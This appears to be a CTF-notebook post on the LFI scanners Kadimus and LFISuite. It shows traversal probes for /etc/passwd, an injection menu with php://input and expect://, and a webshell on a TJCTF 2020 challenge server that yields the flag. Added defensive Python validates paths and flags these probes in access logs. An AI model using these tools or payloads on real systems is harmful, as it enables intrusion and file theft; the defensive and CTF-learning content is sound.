[WEB] LFI Fuzzer

Moved to Notion · May 26, 2020

Kadimus

https://github.com/P0cL4bs/Kadimus

Install

apt install libcurl4-openssl-dev
apt install libpcre3-dev
apt install libssh-dev
git clone https://github.com/P0cL4bs/kadimus.git
cd kadimus
make

Run

./kadimus

Usage

As described on GitHub, it is used by passing options on the command line.

The following is an example of a vulnerability scan.

root@hp-virtual-machine:/work/tools/kadimus# ./kadimus -u https://file_viewer.tjctf.org/reader.php?file=contact -A my_user_agent
 _  __         _ _                     
| |/ /__ _  __| (_)_ __ ___  _   _ ___ 
| ' // _` |/ _` | | '_ ` _ \| | | / __|
| . \ (_| | (_| | | | | | | | |_| \__ \
|_|\_\__,_|\__,_|_|_| |_| |_|\__,_|___/

  v1.5 - LFI Scan & Exploit Tool (@hc0d3r - P0cL4bs Team)

[12:27:13] [INFO] starting scanning the URL: https://file_viewer.tjctf.org/reader.php?file=contact
[12:27:13] [INFO] testing if URL have dynamic content ...
[12:27:15] [INFO] URL dont have dynamic content
[12:27:15] [INFO] analyzing 'file' parameter ...
[12:27:15] [INFO] checking for lfi error messages
[12:27:15] [INFO] using random url: https://file_viewer.tjctf.org/reader.php?file=gdBHSIP
[12:27:16] [WARNING] lfi error not found
[12:27:16] [INFO] starting source disclosure test ...
[12:27:18] [WARNING] parameter does not seem vulnerable to source disclosure
[12:27:18] [INFO] checking common files ...
[12:27:18] [INFO] requesting: https://file_viewer.tjctf.org/reader.php?file=../../../../../../../../../../../../etc/passwd%00
[12:27:19] [INFO] requesting: https://file_viewer.tjctf.org/reader.php?file=../../../../../../../../../../../../etc/passwd
[12:27:19] [INFO] regex match: root:.*:0
[12:27:19] [INFO] check the url: https://file_viewer.tjctf.org/reader.php?file=../../../../../../../../../../../../etc/passwd
[12:27:19] [INFO] requesting: https://file_viewer.tjctf.org/reader.php?file=/etc/passwd
[12:27:19] [INFO] regex match: root:.*:0
[12:27:19] [INFO] check the url: https://file_viewer.tjctf.org/reader.php?file=/etc/passwd
[12:27:19] [INFO] requesting: https://file_viewer.tjctf.org/reader.php?file=/etc/passwd%00

Not that great..
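Where the Kadimus run above stops, it helps to look at the same probes from the defender's side: what the handling of a `file` parameter in a page like reader.php has to do so that traversal to /etc/passwd, the %00 null byte and an absolute path are all rejected before any file is opened. The following Python function is an added example, not code from the page or from Kadimus. The document root `/var/www/html/pages`, the `.txt` suffix the application appends, and the allow-list of page names are assumptions made for the example.

```python
import os
import re

# Assumed document root for the pages the application serves (not from the page).
DOC_ROOT = "/var/www/html/pages"
# Assumed suffix the application appends to the requested name.
PAGE_SUFFIX = ".txt"
# Assumed allow-list of page names the application is willing to serve.
ALLOWED_PAGES = {"contact", "about", "index"}

# Any "scheme://" prefix: php://, expect://, data:// and the rest of the
# wrapper menu LFISuite offers are all caught by the same rule.
WRAPPER_RE = re.compile(r"^[a-z][a-z0-9+.\-]*://", re.IGNORECASE)


def resolve_page(user_value, doc_root=DOC_ROOT, suffix=PAGE_SUFFIX, allowed=None):
    """Map an untrusted 'file' parameter to a path confined to doc_root.

    Returns (absolute_path, "ok") or (None, reason). When `allowed` is given,
    only names in that set are accepted; otherwise any name is accepted as
    long as the canonical path stays inside doc_root.
    """
    # %00 arrives decoded as a NUL byte; old PHP truncated the path there, which
    # is why the Kadimus scan sends ...etc/passwd%00 next to the plain probe.
    if "\x00" in user_value:
        return None, "null byte"
    if WRAPPER_RE.match(user_value):
        return None, "stream wrapper"
    if os.path.isabs(user_value):
        return None, "absolute path"
    if allowed is not None and user_value not in allowed:
        return None, "not in allow-list"

    # Canonicalise both sides (symlinks and ".." collapsed) before comparing,
    # so the check is on where the path really lands, not on how it is spelled.
    root = os.path.realpath(doc_root)
    candidate = os.path.realpath(os.path.join(root, user_value + suffix))
    if os.path.commonpath([root, candidate]) != root:
        return None, "outside document root"
    return candidate, "ok"


if __name__ == "__main__":
    # The probe values below are the ones visible in the Kadimus output.
    probes = [
        "contact",
        "../../../../../../../../../../../../etc/passwd",
        "/etc/passwd",
        "contact\x00",
        "php://input",
    ]
    for p in probes:
        print(repr(p), "->", resolve_page(p, allowed=ALLOWED_PAGES))
```

The allow-list is the strongest check and is enough on its own for an application that only ever serves a handful of known pages; the realpath confinement is the general fallback for applications that must accept arbitrary names within a directory, and it needs no deny-list of `../` spellings because it compares canonical paths rather than strings.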


LFISuite

https://github.com/D35m0nd142/LFISuite

Install

git clone https://github.com/D35m0nd142/LFISuite.git

Run

python lfisuite.py

Usage

When you run it, you can choose between scanning and exploiting.


[*] Checking for LFISuite updates..
[-] No updates available.

--------------------
 1) Exploiter       
 2) Scanner         
 x) Exit            
--------------------
 -> 1

Scan

It prompts for the information it needs, so you just enter the appropriate values.

[*] Enter cookies if needed (ex: 'PHPSESSID=12345;par=something') [just enter if none] -> 

[?] Do you want to enable TOR proxy ? (y/n) n

Exploit

Likewise it prompts for input, and you have to select the vulnerability to attack.

____________________________

    Available Injections    
____________________________

 1) /proc/self/environ      
 2) php://filter            
 3) php://input             
 4) /proc/self/fd           
 5) access_log              
 6) phpinfo                 
 7) data://
 8) expect://
 9) Auto-Hack
 x) Back

Select a vulnerability confirmed with the scan feature and it exploits it automatically.
Taking php://input as an example:

[*] Enter the php://input vulnerable url (ex: 'http://site/index.php?page=') -> https://file_viewer.tjctf.org/reader.php?file=

[+] The website seems to be vulnerable. Opening a Shell..
[If you want to send PHP commands rather than system commands add php:// before them (ex: php:// fwrite(fopen('a.txt','w'),"content");]

Entering the vulnerable URL makes the exploit succeed, and it provides an interface that lets you use the RCE like a bash shell.
The example URL is the File Viewer challenge from TJCTF 2020, and I was able to get the flag using LFISuite.

www-data@file_viewer.tjctf.org:/var/www/html$ ls
apple.txt
grape.txt
i_wonder_whats_in_here
index.html
orange.txt
pear.txt
pinneaple.txt
reader.php
watermelon.txt
www-data@file_viewer.tjctf.org:/var/www/html$ cat i_wonder*/flag.php
<?php
    // tjctf{n1c3_j0b_with_lf1_2_rc3}
?>
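Both tools leave a recognisable trail in the web server's access log: the common-file probes in the Kadimus output above, and LFISuite's wrapper injections (the PHP code it sends through php://input travels in the POST body, which the access log does not record, but the php://input value itself sits in the query string and is logged). The following Python detector is an added example, not part of this post or of either tool: it parses combined-format log lines, percent-decodes each parameter value until it stops changing, and flags the indicators. The log lines are constructed for the example, using documentation IP ranges and the request paths seen on the page.

```python
import re
from urllib.parse import parse_qsl, unquote

# Apache/nginx "combined" format; only the fields the detector uses are named.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3}) \S+'
)

# Indicators derived from the probes the two tools on the page send:
# directory traversal, the %00 null byte, PHP stream wrappers, and the
# files/pseudo-files they look for (/etc/passwd, /proc/self/environ, logs).
INDICATORS = [
    ("traversal", re.compile(r"(^|[\\/])\.\.([\\/]|$)")),
    ("null_byte", re.compile("\x00")),
    ("stream_wrapper", re.compile(r"^\s*(php|expect|data|phar|zip|glob|file)://", re.I)),
    ("sensitive_path", re.compile(r"/etc/passwd|/proc/self/(environ|fd)|access[_.]log", re.I)),
]


def fully_decode(value, rounds=3):
    """Percent-decode repeatedly so double-encoded probes (%252e) surface."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def classify(value):
    """Return the names of the indicators matching one decoded value."""
    return [name for name, rx in INDICATORS if rx.search(value)]


def scan_log(lines):
    """Return one finding per (line, parameter) that carries an indicator."""
    findings = []
    for lineno, line in enumerate(lines, start=1):
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        _, _, query = m.group("target").partition("?")
        for param, raw in parse_qsl(query, keep_blank_values=True):
            value = fully_decode(raw)
            hits = classify(value)
            if hits:
                findings.append({"line": lineno, "ip": m.group("ip"),
                                 "method": m.group("method"), "param": param,
                                 "value": value, "indicators": hits})
    return findings


def count_by_ip(findings):
    """Number of flagged requests per source address, for triage ordering."""
    counts = {}
    for f in findings:
        counts[f["ip"]] = counts.get(f["ip"], 0) + 1
    return counts


# Constructed sample log (not real traffic): one benign request, the Kadimus
# probes, the LFISuite php://input and /proc/self/environ injections, and one
# double-encoded traversal.
SAMPLE_LOG = [
    '203.0.113.10 - - [26/May/2020:12:27:13 +0000] "GET /reader.php?file=contact HTTP/1.1" 200 512 "-" "my_user_agent"',
    '203.0.113.10 - - [26/May/2020:12:27:18 +0000] "GET /reader.php?file=../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 200 1024 "-" "my_user_agent"',
    '203.0.113.10 - - [26/May/2020:12:27:19 +0000] "GET /reader.php?file=/etc/passwd HTTP/1.1" 200 1024 "-" "my_user_agent"',
    '198.51.100.7 - - [26/May/2020:12:40:02 +0000] "POST /reader.php?file=php://input HTTP/1.1" 200 233 "-" "python-requests/2.23.0"',
    '198.51.100.7 - - [26/May/2020:12:40:05 +0000] "GET /reader.php?file=../../../../proc/self/environ HTTP/1.1" 200 777 "-" "python-requests/2.23.0"',
    '192.0.2.5 - - [26/May/2020:13:01:44 +0000] "GET /reader.php?file=%252e%252e%252f%252e%252e%252fetc%252fpasswd HTTP/1.1" 404 162 "-" "curl/7.68.0"',
]

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"line {f['line']:>2} {f['ip']:<13} {f['method']:<4} {f['param']}={f['value']!r} -> {f['indicators']}")
    print(count_by_ip(scan_log(SAMPLE_LOG)))
```

The detector only looks at query parameter values; a request that puts the traversal in the path component, or a tool that sends the parameter in a POST body, would need the same classification applied to those fields. The regexes are a triage aid for log review, not a blocking rule: the real fix is the allow-list and path confinement in the application itself.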

References

https://www.peerlyst.com/posts/pentest-tools-lfi-scanners-and-exploiters-karl-m-1
